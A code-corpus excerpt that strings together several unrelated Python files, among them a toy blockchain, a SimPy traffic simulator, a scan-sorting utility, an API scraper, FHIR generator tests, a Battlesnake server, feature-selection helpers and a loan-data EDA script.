blockchain._debug(flags)
return True if len(flags) == 0 else False
def mine_block(self, recipient):
"""This method mine the new block with the opentransaction list
:param recipient: Miner's ID - who is being rewarded for mining the block
:type recipient: str
:returns: None
"""
last_block = self.block_chain[-1] # Get the Last block
last_hash = last_block.hash # Get the hash of the last block
nonce = self.proof_of_work() # Determine the nonce value
# Create the reward and append it to the open transactions
reward_transaction = Transaction(sender=None, recipient=recipient, book=None, transaction_type=2)
self.open_transactions.append(reward_transaction)
# Create the new Block
new_block = Block(last_hash, self.open_transactions, index=len(self.block_chain), nonce=nonce)
self.block_chain.append(new_block)
self.open_transactions = []
def fork_chain(self, index=None):
"""Create a fork *-copy* of the block-chain with index*- beginning* preferred
The copy is made by a deep-copy
:param index: the start of the *forking*, defaults to None
:type index: int, optional
"""
copy = cp.deepcopy(self)
copy.block_chain = copy.block_chain[index:]
return copy
def to_json(self):
"""
to_json converts the object into a json object
:var dict_json: contains information about the blocks
:type dict_json: dict
:returns: a dict (json) containing the chain
:rtype: dict
"""
dict_json = {}
# Loop through and convert the block to json objects
for i, block in enumerate(self.block_chain):
dict_json[i] = block.to_json()
return dict_json
    # Returns the number of blocks in the chain
number_blocks = lambda self: len(self.block_chain)
def __eq__(self, other):
return self.to_json() == other.to_json()
def __repr__(self):
return str(self.to_json())
def __str__(self):
print(f'::{self.number_blocks()} blocks in the blockchain')
for block, number in zip(self.block_chain, range(len(self.block_chain))):
print('number\n', number)
print('block\n', block)
return ''
@staticmethod
def json_to_blockchain(bc_json):
bc = BlockChain(override=True)
for block in bc_json.values():
bc.block_chain.append(Block.json_to_block(block))
return bc
def _debug(self, msg, pprint=False):
"""Prints helpful information in debug mode
_debug print with different color depending on the node_type
:param msg: the message to display
:type msg: string
:param pprint: prints a msg with a pprint *with indentation*, defaults to False
:type pprint: bool, optional
"""
if self.debug:
if not pprint:
print(colored(msg, 'magenta'))
else:
pp(msg, indent=4, width=4)
if __name__ == '__main__':
    # Example of how to use the blockchain object
blockchain = BlockChain()
print(blockchain)
blockchain.create_append_transaction(Transaction('mouha', 'recipient',
Book(title='The Selfish Gene', author='<NAME>',
date='19--', genre='Science')))
blockchain.mine_block('zeddo')
print(blockchain)
| 3.3125
| 3
|
Fabric_socket.py
|
sgino209/Traffic_Simulation
| 0
|
12783478
|
<reponame>sgino209/Traffic_Simulation
__author__ = 'shahargino'
import simpy
class Fabric_socket:
"""This class implements the socket core of the Fabric"""
# ----------------------------------------------------------------------------------------
def __init__(self, name, params, parent, tb):
self.name = self.__class__.__name__ + "_" + name
self.env = tb['ENV']
self.params = params
self.parent = parent
self.clk_ns = parent.clk_ns
self.granted = True
if self.params['INIT_TGT'] == 'initiator':
self.granted = False
self.debug = tb['AUX'].debug
self.error = tb['AUX'].error
self.action = self.env.process(self.run())
for key, value in self.params.iteritems():
self.debug(self.name, 'Created with %s = %s' % (key, value))
# ----------------------------------------------------------------------------------------
def is_initiator(self):
return self.params['INIT_TGT'] == 'initiator'
# ----------------------------------------------------------------------------------------
def set_grant(self, val):
if not self.granted and val:
self.debug(self.name, '"%s" has been granted by Fabric Arbiter' % self.name)
self.granted = val
# ----------------------------------------------------------------------------------------
def run(self):
while True:
try:
yield self.env.timeout(self.clk_ns)
if self.params['INIT_TGT'] == 'initiator' and self.granted:
self.parent.action.interrupt(
["SOCKET_GRANTED", self.name[len(self.__class__.__name__ + "_"):]]
)
except simpy.Interrupt as interrupt:
int_cause = interrupt.cause
if int_cause[0] == 'MESSAGE_FOR_TARGET':
if self.is_initiator():
self.error(self.name, 'An Initiator socket cannot receive Target messages')
else:
self.parent.action.interrupt(int_cause)
| 2.359375
| 2
|
scanpdf/sort.py
|
mjirik/scanpdf
| 0
|
12783479
|
<filename>scanpdf/sort.py
# /usr/bin/env python
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger(__name__)
# conda create -c conda-forge -n -c mcs07 scanpdf python=3.6 numpy scikit-image jupyter tesseract
import sys
import glob
import os.path as op
import os
import shutil
import numpy as np
from matplotlib import pyplot as plt
import scipy.misc
import skimage.transform
import skimage.io
import scanpdf.deskew
def make_output_dir(path):
    head, tail = op.split(path)
    output_path = op.join(head, tail + " - sorted")
    if not op.exists(output_path):
        os.makedirs(output_path)
    return output_path
def sort_prepare_parameters(path, reverse_odd_pages=False, reverse_even_pages=True, turn_odd_pages=False, turn_even_pages=True):
fns = glob.glob(op.join(path, "*"))
fns.sort(key=os.path.getmtime)
length = len(fns)
if length % 2 == 1:
raise ValueError("Even number of files expected")
len2 = int(length / 2)
processing_params = [None] * length
# fns sorted by datetime
for i, fn in enumerate(fns):
turn = False
if i < len2:
# odd
if reverse_odd_pages:
inew = ((len2 - i) * 2) + 1
else:
inew = (i * 2) + 1
turn = turn_odd_pages
else:
# even
if reverse_even_pages:
inew = (length - i) * 2
else:
inew = (i - len2) * 2
turn = turn_even_pages
        processing_params[inew - 1] = {"inew": inew, "turn": turn, "fn": fn, "empty": False}
# print(inew, turn, fn)
return processing_params
def sort_write_output(processing_params, output_path):
for ppars in processing_params:
inew = ppars["inew"]
turn = ppars["turn"]
fn = ppars["fn"]
_, ext = op.splitext(fn)
# = processing_params[i]
new_short_fn = '{:04d}'.format(inew) + ext
# print(new_short_fn, inew, ppars["empty"], fn[-10:])
if ppars["empty"]:
new_short_fn = "_empty_" + new_short_fn
# continue
new_fn = op.join(output_path, new_short_fn)
im = skimage.io.imread(fn)
if turn:
im = skimage.transform.rotate(im, 180)
if "angle" in ppars:
im = skimage.transform.rotate(im, ppars["angle"], cval=1)
skimage.io.imsave(new_fn, im)
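
# Illustrative end-to-end usage (added sketch; the path and flags are assumptions):
#   scans_dir = "/data/scans/notebook-2019"
#   params = sort_prepare_parameters(scans_dir, turn_even_pages=True)
#   sort_write_output(params, make_output_dir(scans_dir))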
| 2.75
| 3
|
teachers_notes/api_example.py
|
kchiv/data_science_basics
| 26
|
12783480
|
<filename>teachers_notes/api_example.py
# show how product information is collected from an API
# first import packages
import urllib2
import json
import pandas as pd
# this is your api information
my_api_key = "<KEY>"
# build the api url, passing in your api key
url = "http://api.shopstyle.com/api/v2/"
ties = "{}products?pid={}&cat=mens-ties&limit=100".format(url, my_api_key)
# open the connection to the api endpoint
jsonResponse = urllib2.urlopen(ties)
data = json.load(jsonResponse)
# parse the response to find out how many pages of results there are
total = data['metadata']['total']
limit = data['metadata']['limit']
offset = data['metadata']['offset']
pages = (total / limit)
print "{} total, {} per page. {} pages to process".format(total, limit, pages)
# tmp = pd.DataFrame(data['products'])
# set up an empty dictionary
dfs = {}
# connect with api again, page by page and save the results to the dictionary
for page in range(pages+1):
    allTies = "{}products?pid={}&cat=mens-ties&limit=100&offset={}&sort=popular".format(url, my_api_key, (page*limit))
jsonResponse = urllib2.urlopen(allTies)
data = json.load(jsonResponse)
dfs[page] = pd.DataFrame(data['products'])
# convert the dictionary to a pandas data frame object
df = pd.concat(dfs, ignore_index=True)
# Cleaning records, removing duplicates
df = df.drop_duplicates('id')
df['priceLabel'] = df['priceLabel'].str.replace(r'\$', '')
df['priceLabel'] = df['priceLabel'].astype(float)
# continue cleaning up the data, split data into columns as necessary
def breakId(x, y = 0):
try:
y = x["id"]
except:
pass
return y
def breakName(x, y=""):
try:
y = x["name"]
except:
pass
return y
df['brandId'] = df['brand'].map(breakId);
df['brandName'] = df['brand'].map(breakName);
def breakCanC(x,y=""):
try:
y = x[0]["canonicalColors"][0]["name"]
except:
pass
return y
def breakColorName(x, y=""):
try:
y = x[0]["name"]
except:
pass
return y
def breakColorId(x, y=""):
try:
y = x[0]["canonicalColors"][0]["id"]
except:
pass
return y
df['colorId'] = df['colors'].map(breakColorId);
df['colorFamily'] = df['colors'].map(breakCanC);
df['colorNamed'] = df['colors'].map(breakColorName);
# export to data.csv
df.to_csv("data.csv", sep='\t', encoding='utf-8',
columns=['id', 'priceLabel', 'name','brandId', 'brandName', 'colorId', 'colorFamily', 'colorNamed'])
| 3.703125
| 4
|
tests/test_generate.py
|
anthem-ai/fhir-types
| 2
|
12783481
|
from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Any, Dict, List, Tuple
import pytest
from scripts.generate import (
CIRCULAR_PROPERTY_REFERENCES,
CIRCULAR_REFERENCES,
INT_PROPERTIES,
ObjectDefinition,
OneOfDefinition,
PrimitiveDefinition,
Property,
Schema,
generate_files,
get_definition_class,
get_import_line_from_reference,
get_init_py,
get_resource_file_name,
get_resource_from_path,
get_resource_var_name,
get_schema,
)
def test_utils() -> None:
assert get_resource_from_path("#/definitions/Account") == "Account"
assert get_resource_var_name("Account") == "FHIR_Account"
assert get_resource_file_name("Account") == "FHIR_Account"
import_line = "from .FHIR_Account import FHIR_Account\n"
assert get_import_line_from_reference("Account") == import_line
assert Property.get_enum_literal(["a", "b"]) == 'Literal["a", "b"]'
def test_get_definition() -> None:
assert type(OneOfDefinition) == type(
get_definition_class("Property", {"oneOf": []})
)
assert type(PrimitiveDefinition) == type(
get_definition_class("boolean", {"properties": {}})
)
assert type(ObjectDefinition) == type(
get_definition_class("Property", {"properties": {}})
)
with pytest.raises(Exception, match="Not expecting this schema definition"):
get_definition_class("Property", {"oneOfQQQ": []})
def test_primitive_def() -> None:
def build(line: str) -> str:
return f"# aaa\n{line}"
assert PrimitiveDefinition(
"a", {"description": "aaa", "type": "string"}
).generate() == build("FHIR_a = str")
assert PrimitiveDefinition(
"a", {"description": "aaa", "type": "boolean"}
).generate() == build("FHIR_a = bool")
assert PrimitiveDefinition(
"a", {"description": "aaa", "type": "number"}
).generate() == build("FHIR_a = float")
# No Type Provided (XHTML works this way)
assert PrimitiveDefinition("a", {"description": "aaa"}).generate() == build(
"FHIR_a = str"
)
# Check override INT
prop_name = INT_PROPERTIES[0]
assert PrimitiveDefinition(
prop_name, {"description": "aaa", "type": "number"}
).generate() == build(f"FHIR_{prop_name} = int")
# Check bad type given
with pytest.raises(Exception, match="Not able to handle schema"):
PrimitiveDefinition("a", {"description": "aaa", "type": "number123"}).generate()
def test_oneof_def() -> None:
schema = {
"oneOf": [{"$ref": "#/definitions/Account"}, {"$ref": "#/definitions/Patient"}]
}
lines = [
"from typing import Union",
"from .FHIR_Account import FHIR_Account",
"from .FHIR_Patient import FHIR_Patient",
"FHIR_Result = Union[",
" FHIR_Account,",
" FHIR_Patient,",
"]",
]
definition = OneOfDefinition("Result", schema)
result = definition.generate().split("\n")
for i in range(len(result)):
assert result[i] == lines[i]
def test_object_def() -> None:
schema = {
"description": "aaa",
"properties": {
"a": {"description": "bbb", "type": "string"},
"b": {"description": "bbb", "$ref": "#/definitions/Account"},
},
}
lines = [
"from typing import Any, List, TypedDict, Literal",
"from .FHIR_Account import FHIR_Account",
"# aaa",
'FHIR_Result = TypedDict("FHIR_Result", {',
" # bbb",
' "a": str,',
" # bbb",
' "b": FHIR_Account,',
"}, total=False)",
]
definition = ObjectDefinition("Result", schema)
result = definition.generate().split("\n")
for i in range(len(result)):
assert result[i] == lines[i]
def test_object_def_circular() -> None:
circular_reference = list(CIRCULAR_REFERENCES)[0]
circular_parent = list(CIRCULAR_PROPERTY_REFERENCES.keys())[0]
circular_property = CIRCULAR_PROPERTY_REFERENCES[circular_parent][0]
schema = {
"description": "aaa",
"properties": {
# property can't point to self
"a": {"description": "bbb", "$ref": f"#/definitions/{circular_parent}"},
# circular references are blacklisted
"b": {"description": "bbb", "$ref": f"#/definitions/{circular_reference}"},
# reference.properties are blacklisted
circular_property: {"description": "bbb", "$ref": "#/definitions/123"},
},
}
# There should be no import references in any of these cases
lines = [
"from typing import Any, List, TypedDict, Literal",
"# aaa",
f"FHIR_{circular_parent} = TypedDict(\"FHIR_{circular_parent}\", {'{'}",
" # bbb",
' "a": Any,',
" # bbb",
' "b": Any,',
" # bbb",
f' "{circular_property}": Any,',
"}, total=False)",
]
definition = ObjectDefinition(circular_parent, schema)
result = definition.generate().split("\n")
for i in range(len(result)):
assert result[i] == lines[i]
def test_property_gen() -> None:
parent = "Parent"
circular_reference = list(CIRCULAR_REFERENCES)[0]
mappings: List[Tuple[str, Dict[str, Any]]] = [
("bool", {"description": "aaa", "type": "boolean"}),
("str", {"description": "aaa", "type": "string"}),
("float", {"description": "aaa", "type": "number"}),
('Literal["Account"]', {"description": "aaa", "const": "Account"}),
('Literal["a", "b"]', {"description": "aaa", "enum": ["a", "b"]}),
("FHIR_Account", {"description": "aaa", "$ref": "#/definitions/Account"}),
(
'List[Literal["a", "b"]]',
{
"description": "aaa",
"type": "array",
"items": {"enum": ["a", "b"]},
},
),
(
"List[FHIR_Account]",
{
"description": "aaa",
"type": "array",
"items": {"$ref": "#/definitions/Account"},
},
),
# Circular Reference
("Any", {"description": "aaa", "$ref": f"#/definitions/{circular_reference}"}),
# Self reference
("Any", {"description": "aaa", "$ref": f"#/definitions/{parent}"}),
]
for result, schema in mappings:
p = Property("prop_a", schema, parent)
assert p.generate_property() == result
# Check Circular Property as well
circular_parent = list(CIRCULAR_PROPERTY_REFERENCES.keys())[0]
circular_property = CIRCULAR_PROPERTY_REFERENCES[circular_parent][0]
p2 = Property(
circular_property,
{"description": "aaa", "$ref": "#/definitions/123"},
circular_parent,
)
assert p2.generate_property() == "Any"
def test_property_gen_fail() -> None:
with pytest.raises(Exception, match="Property schema can not be handled"):
schema: Schema = {"description": "aaa", "type": "123"}
p = Property("prop_a", schema, "parent")
p.generate()
with pytest.raises(Exception, match=r"items should have \$ref or enum"):
schema = {"description": "aaa", "type": "array", "items": {"type": "string"}}
p = Property("prop_a", schema, "parent")
p.generate()
def test_get_init_py() -> None:
expected = """from .FHIR_foo import FHIR_foo
from .FHIR_bar import FHIR_bar
__all__ = ['FHIR_foo', 'FHIR_bar']
"""
assert get_init_py(["foo", "bar"]) == expected
def test_generate_files_and_get_schema() -> None:
with TemporaryDirectory() as _tempdir:
tempdir = Path(_tempdir)
generate_files(get_schema(), tempdir)
assert tempdir.joinpath("__init__.py").exists()
assert tempdir.joinpath("FHIR_Account.py").exists()
assert tempdir.joinpath("FHIR_Patient.py").exists()
| 2.375
| 2
|
app/main.py
|
dogacuboh/doga-cuboh-snake
| 0
|
12783482
|
import json
import os
import bottle
import time
from app.api import ping_response, start_response, move_response, end_response
from app.board import update_board
from app.random_snake import random_move
from app.food_snake import food_move
from app.wall_snake import wall_move
from app.smart_snake import smart_move
from app.doga_snake import doga_move
snake_num = 0
@bottle.route('/')
def index():
return bottle.static_file('index.html', root='./static/')
@bottle.route('/static/<path:path>')
def static(path):
return bottle.static_file(path, root='./static/')
@bottle.post('/ping')
def ping():
return ping_response()
@bottle.post('/start')
def start():
game_state = bottle.request.json
snake_colour = "#ff0000"
return start_response(snake_colour)
@bottle.post('/move')
def move():
game_state = bottle.request.json
new_board = update_board(game_state)
direction = ""
direction = doga_move(game_state, new_board)
return move_response(direction)
@bottle.post('/end')
def end():
game_state = bottle.request.json
return end_response()
# Expose WSGI app (so gunicorn can find it)
application = bottle.default_app()
def is_input(temp):
if not temp.isnumeric():
return False
if not len(temp)==1:
return False
if int(temp)<1 or int(temp)>5:
return False
return True
if __name__ == '__main__':
snake_num = 5
bottle.run(
application,
host=os.getenv('IP', '0.0.0.0'),
port=os.getenv('PORT', '8080'),
debug=os.getenv('DEBUG', True)
)
| 2.203125
| 2
|
helpers/utils.py
|
mirceamironenco/GANs
| 8
|
12783483
|
<filename>helpers/utils.py
def print_flags(flags):
for key, value in vars(flags).items():
print("{}: {}".format(key, str(value)))
def load_mnist():
from tensorflow.examples.tutorials.mnist import input_data
return input_data.read_data_sets("./MNIST_data", one_hot=True)
| 2.53125
| 3
|
src/features/feature_selection.py
|
gaybro8777/data_science_for_health_unicamp
| 1
|
12783484
|
import os
import pandas as pd
import pdb
import seaborn as sns
import matplotlib.pyplot as plt
#import pymrmr
from scipy.stats import kendalltau, pearsonr, spearmanr
from sklearn.feature_selection import SelectKBest, mutual_info_classif, chi2, f_classif, RFE
import numpy as np
# Feature Importance Sklearn
# https://machinelearningmastery.com/calculate-feature-importance-with-python/
class Feature_Selection(object):
"""
    Class with preprocessing steps to apply to a dataframe
"""
def __init__(self):
super().__init__()
self.correlation_matrix = Correlation_Matrix()
def select_features(self,df,columns):
raise NotImplementedError()
def get_missing_values_df(self,df):
percent_missing = df.isnull().sum() * 100 / len(df)
missing_value_df = pd.DataFrame({'column_name': df.columns,'percent_missing': percent_missing})
return missing_value_df
def get_correlation_matrix(self,df,method):
return self.correlation_matrix.get_correlation_matrix(df,method)
def plot_correlation_matrix(self,df_corr,plot=True):
return self.correlation_matrix.plot_correlation_matrix(df_corr,plot)
def get_correlation_with_target(self,df,target_column,method,num_feats=10):
return self.correlation_matrix.get_correlation_with_target(df,target_column,method,num_feats)
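    def _split_df_in_xy(self, df, target_column):
        # Assumed helper (referenced below but not defined in the original snippet):
        # separates the feature matrix X from the target vector y for the selectors.
        X = df.drop(columns=[target_column])
        y = df[target_column]
        return X, y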
    def get_IG_feature_scores(self, df, target_column, n_features_to_select):
        """
        IG calculates the importance of each feature by measuring the increase in entropy when the feature is given vs. absent.
        """
        X, y = self._split_df_in_xy(df, target_column)
        bestfeatures = SelectKBest(score_func=mutual_info_classif, k=n_features_to_select)  # k is the number of features to keep
        fit = bestfeatures.fit(X, y)
        dfscores = pd.DataFrame(fit.scores_)
        dfcolumns = pd.DataFrame(X.columns)
        featureScores = pd.concat([dfcolumns, dfscores], axis=1)
        featureScores.columns = ['Feature', 'Score']
        return featureScores
# def get_mRMR_feature_scores(self,df,n_features_to_select):
# # https://medium.com/subex-ai-labs/feature-selection-techniques-for-machine-learning-in-python-455dadcd3869
# """
# (Minimal Redundancy and Maximal Relevance)
# Intuition: It selects the features, based on their relevancy with the target variable, as well as their redundancy with the other features.
# """
# selected_features = pymrmr.mRMR(df, 'MIQ',n_features_to_select)
# return selected_features
    def get_chisquare_feature_scores(self, df, target_column, n_features_to_select):
        """
        It calculates the correlation between each feature and the target and selects the best k features according to their chi-square test score.
        """
        X, y = self._split_df_in_xy(df, target_column)
        bestfeatures = SelectKBest(score_func=chi2, k=n_features_to_select)  # k is the number of features to keep
        fit = bestfeatures.fit(X, y)
        dfscores = pd.DataFrame(fit.scores_)
        dfcolumns = pd.DataFrame(X.columns)
        featureScores = pd.concat([dfcolumns, dfscores], axis=1)
        featureScores.columns = ['Feature', 'Score']
        return featureScores
    def get_anova_feature_scores(self, df, target_column, n_features_to_select):
        """
        We perform an ANOVA F-test between each feature and the target to check whether they belong to the same population.
        """
        X, y = self._split_df_in_xy(df, target_column)
        bestfeatures = SelectKBest(score_func=f_classif, k=n_features_to_select)  # k is the number of features to keep
        fit = bestfeatures.fit(X, y)
        dfscores = pd.DataFrame(fit.scores_)
        dfcolumns = pd.DataFrame(X.columns)
        featureScores = pd.concat([dfcolumns, dfscores], axis=1)
        featureScores.columns = ['Feature', 'Score']
        return featureScores
    def get_features_by_RFE(self, df, target_column, model, n_features_to_select=20):
        """
        It is a greedy optimization algorithm which aims to find the best performing feature subset. It repeatedly creates models and sets aside the best or the worst performing feature at each iteration. It constructs the next model with the remaining features until all the features are exhausted, and then ranks the features based on the order of their elimination.
        """
        # model = LogisticRegression(max_iter=1000)
        X, y = self._split_df_in_xy(df, target_column)
        rfe_model = RFE(model, n_features_to_select=n_features_to_select)
        rfe_fit = rfe_model.fit(X, y)
        selected = X[X.columns[rfe_fit.get_support(indices=True)]]
        return selected
    def get_feature_selection_summary(self, feature_name, cor_support, chi_support, rfe_support,
                                      embeded_lr_support, embeded_rf_support, embeded_lgb_support, num_feats=10):
        # https://towardsdatascience.com/the-5-feature-selection-algorithms-every-data-scientist-need-to-know-3a6b566efd2
        # put all selections together (each *_support argument is the boolean mask produced by the corresponding selector)
        feature_selection_df = pd.DataFrame({'Feature': feature_name, 'Pearson': cor_support, 'Chi-2': chi_support, 'RFE': rfe_support, 'Logistics': embeded_lr_support,
                                             'Random Forest': embeded_rf_support, 'LightGBM': embeded_lgb_support})
        # count the selected times for each feature
        feature_selection_df['Total'] = feature_selection_df.drop(columns=['Feature']).sum(axis=1)
        # keep the top features
        feature_selection_df = feature_selection_df.sort_values(['Total', 'Feature'], ascending=False)
        feature_selection_df.index = range(1, len(feature_selection_df) + 1)
        return feature_selection_df.head(num_feats)
class Correlation_Matrix(object):
def __init__(self):
super().__init__()
def get_correlation_with_target(self,df,target_column,method,num_feats):
corr_dict = self.get_correlation_matrix(df,method)
df_k,df_p = corr_dict['df_k'],corr_dict['df_p']
correlations_with_target = df_k[target_column]
correlations_with_target = correlations_with_target.fillna(0)
correlations_with_target = correlations_with_target[correlations_with_target.index.difference([target_column])]
correlations_with_target = correlations_with_target.map(lambda x : x).abs().sort_values(ascending = False)
correlations_with_target = correlations_with_target[:num_feats]
return correlations_with_target
def plot_correlation_matrix(self,df_corr,plot=True):
plt.figure(figsize=(16, 6))
heatmap = sns.heatmap(df_corr, vmin=-1, vmax=1, annot=True, cmap='coolwarm')
heatmap.set_title('Correlation Heatmap', fontdict={'fontsize':18}, pad=12)
if plot:
plt.show()
else:
return heatmap
def get_correlation_matrix(self,df,method):
        accepted_correlations = ['pearson', 'spearman', 'kendall']
        if method not in accepted_correlations:
            raise ValueError(f"The method must be one of {accepted_correlations}")
if method == 'pearson':
method_k = self._pearsonr_rval
method_p = self._pearsonr_pval
elif method == 'spearman':
method_k = self._spearmanr_rval
method_p = self._spearmanr_pval
elif method == 'kendall':
method_k = self._kendall_rval
method_p = self._kendall_pval
df_k = df.corr(method=method_k)
df_p = df.corr(method=method_p)
return {'df_k':df_k,'df_p':df_p}
def _kendall_rval(self,x,y):
return np.round(kendalltau(x,y)[0],6)
def _pearsonr_rval(self,x,y):
return np.round(pearsonr(x,y)[0],6)
def _spearmanr_rval(self,x,y):
return np.round(spearmanr(x,y)[0],6)
def _kendall_pval(self,x,y):
return np.round(kendalltau(x,y)[1],6)
def _pearsonr_pval(self,x,y):
return np.round(pearsonr(x,y)[1],6)
def _spearmanr_pval(self,x,y):
return np.round(spearmanr(x,y)[1],6)
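# --- Usage sketch (illustrative only) ---------------------------------------
# A minimal, hedged example of how Correlation_Matrix is meant to be used.
# The toy DataFrame below is an assumption made purely for illustration.
def _correlation_matrix_usage_example():
    import numpy as np
    import pandas as pd

    rng = np.random.default_rng(0)
    toy = pd.DataFrame({
        'x1': rng.normal(size=100),
        'x2': rng.normal(size=100),
    })
    toy['target'] = (toy['x1'] + 0.1 * rng.normal(size=100) > 0).astype(int)

    cm = Correlation_Matrix()
    # Absolute Kendall correlation of every feature with the target,
    # strongest first, truncated to the top 2 features.
    top = cm.get_correlation_with_target(toy, 'target', method='kendall', num_feats=2)
    # Full correlation and p-value matrices (Spearman here).
    mats = cm.get_correlation_matrix(toy, method='spearman')
    return top, mats['df_p']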
| 3.390625
| 3
|
setup.py
|
rom1mouret/orthogonal_learning
| 5
|
12783485
|
<filename>setup.py
#!/usr/bin/env python
from distutils.core import setup
setup(name='orthocl',
version='0.1',
description='Orthogonal Continual Learning',
author='<NAME>',
url='https://github.com/rom1mouret/orthogonal_learning',
packages=['orthocl'],
)
| 1.171875
| 1
|
Code/EDA.py
|
mdevineni89/Final-Project-Group3
| 0
|
12783486
|
#########
# 11/15/2021
# Assumed context: `df` is the loan dataset DataFrame loaded earlier in the project.
import numpy as np  # needed for the heatmap masks (np.triu) further below
#Generating a dataset for only categorical
df_categorical = df.select_dtypes(exclude=['number'])
df_categorical=df_categorical.drop(['Date.of.Birth','DisbursalDate'],axis=1)
df_categorical.head()
#Building a Dataset for numerical (continuous)
df_continuous = df.select_dtypes(include=['number'])
df_continuous=df_continuous.drop(['UniqueID'],axis=1)
df_continuous.head()
#Univariate Analysis
import matplotlib.pyplot as plt # Load matplotlib
import seaborn as sns # Load seaborn
#To obtain the basic statistics
df_continuous.describe()
#Get the List of all Column Names
continuous_list = list(df_continuous)
# Plot for all continuous variables
#1
sns.displot(df['disbursed_amount'][df['disbursed_amount'] < df['disbursed_amount'].quantile(.99)],kind='hist',kde=True)
plt.show()
#2
sns.displot(df['asset_cost'][df['asset_cost'] < df['asset_cost'].quantile(.99)],kind='hist',kde=True)
plt.show()
#3
sns.displot(df['ltv'][df['ltv'] < df['ltv'].quantile(.99)],kind='hist',kde=True)
plt.show()
#4
sns.displot(df['PERFORM_CNS.SCORE'][df['PERFORM_CNS.SCORE'] < df['PERFORM_CNS.SCORE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#5
sns.displot(df['PRI.NO.OF.ACCTS'][df['PRI.NO.OF.ACCTS'] < df['PRI.NO.OF.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#6
sns.displot(df['PRI.ACTIVE.ACCTS'][df['PRI.ACTIVE.ACCTS'] < df['PRI.ACTIVE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#6
sns.displot(df['PRI.OVERDUE.ACCTS'][df['PRI.OVERDUE.ACCTS'] < df['PRI.OVERDUE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#7
sns.displot(df['PRI.CURRENT.BALANCE'][df['PRI.CURRENT.BALANCE'] < df['PRI.CURRENT.BALANCE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#8
sns.displot(df['PRI.SANCTIONED.AMOUNT'][df['PRI.SANCTIONED.AMOUNT'] < df['PRI.SANCTIONED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#9
sns.displot(df['PRI.DISBURSED.AMOUNT'][df['PRI.DISBURSED.AMOUNT'] < df['PRI.DISBURSED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#10
sns.displot(df['SEC.NO.OF.ACCTS'][df['SEC.NO.OF.ACCTS'] < df['SEC.NO.OF.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#11
sns.displot(df['SEC.ACTIVE.ACCTS'][df['SEC.ACTIVE.ACCTS'] < df['SEC.ACTIVE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#12
sns.displot(df['SEC.OVERDUE.ACCTS'][df['SEC.OVERDUE.ACCTS'] < df['SEC.OVERDUE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#13
sns.displot(df['SEC.CURRENT.BALANCE'][df['SEC.CURRENT.BALANCE'] < df['SEC.CURRENT.BALANCE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#14
sns.displot(df['SEC.SANCTIONED.AMOUNT'][df['SEC.SANCTIONED.AMOUNT'] < df['SEC.SANCTIONED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#15
sns.displot(df['SEC.DISBURSED.AMOUNT'][df['SEC.DISBURSED.AMOUNT'] < df['SEC.DISBURSED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#16
sns.displot(df['PRIMARY.INSTAL.AMT'][df['PRIMARY.INSTAL.AMT'] < df['PRIMARY.INSTAL.AMT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#17
sns.displot(df['NEW.ACCTS.IN.LAST.SIX.MONTHS'][df['NEW.ACCTS.IN.LAST.SIX.MONTHS'] < df['NEW.ACCTS.IN.LAST.SIX.MONTHS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#18
sns.displot(df['DELINQUENT.ACCTS.IN.LAST.SIX.MONTHS'][df['DELINQUENT.ACCTS.IN.LAST.SIX.MONTHS'] < df['DELINQUENT.ACCTS.IN.LAST.SIX.MONTHS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#19
sns.displot(df['AVERAGE.ACCT.AGE'][df['AVERAGE.ACCT.AGE'] < df['AVERAGE.ACCT.AGE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#20
sns.displot(df['CREDIT.HISTORY.LENGTH'][df['CREDIT.HISTORY.LENGTH'] < df['CREDIT.HISTORY.LENGTH'].quantile(.99)],kind='hist',kde=True)
plt.show()
#21 (note: this repeats the CREDIT.HISTORY.LENGTH plot from #20)
sns.displot(df['CREDIT.HISTORY.LENGTH'][df['CREDIT.HISTORY.LENGTH'] < df['CREDIT.HISTORY.LENGTH'].quantile(.99)],kind='hist',kde=True)
plt.show()
#22
sns.displot(df['NO.OF_INQUIRIES'][df['NO.OF_INQUIRIES'] < df['NO.OF_INQUIRIES'].quantile(.99)],kind='hist',kde=True)
plt.show()
#23
sns.displot(df['Age'][df['Age'] < df['Age'].quantile(.99)],kind='hist',kde=True)
plt.show()
#24
sns.displot(df['Disbursal_months'][df['Disbursal_months'] < df['Disbursal_months'].quantile(.99)],kind='hist',kde=True)
plt.show()
########Multivariate Analysis
plt.rcParams["figure.figsize"] = (10,7)
sns.heatmap(df_continuous.corr())
plt.show()
#Heat map
sns.heatmap(df_continuous.corr(), cmap="YlGnBu", annot=False,mask=np.triu(df_continuous.corr()))
plt.show()
#Heat map that highlights if the correlation is greater than 0.6
sns.heatmap(df_continuous.corr().abs()>0.6, cmap="YlGnBu", annot=False,mask=np.triu(df_continuous.corr()))
plt.show() # black are with the highest correlation
def get_redundant_pairs(df):
'''Get diagonal and lower triangular pairs of correlation matrix'''
pairs_to_drop = set()
cols = df.columns
for i in range(0, df.shape[1]):
for j in range(0, i+1):
pairs_to_drop.add((cols[i], cols[j]))
return pairs_to_drop
def get_top_abs_correlations(df, n=5):
au_corr = df.corr().abs().unstack()
labels_to_drop = get_redundant_pairs(df)
au_corr = au_corr.drop(labels=labels_to_drop).sort_values(ascending=False)
return au_corr[0:n]
list1=get_top_abs_correlations(df_continuous,n=9)
print(list1)
'''
11/22 Aihan added, file name unchanged
test needed
'''
# Continuous variable vs categorical variables
score_ranking = ["A-Very Low Risk", "B-Very Low Risk", "C-Very Low Risk", "D-Very Low Risk", \
"E-Low Risk", "F-Low Risk", "G-Low Risk", "H-Medium Risk", "I-Medium Risk", "J-High Risk", "K-High Risk",\
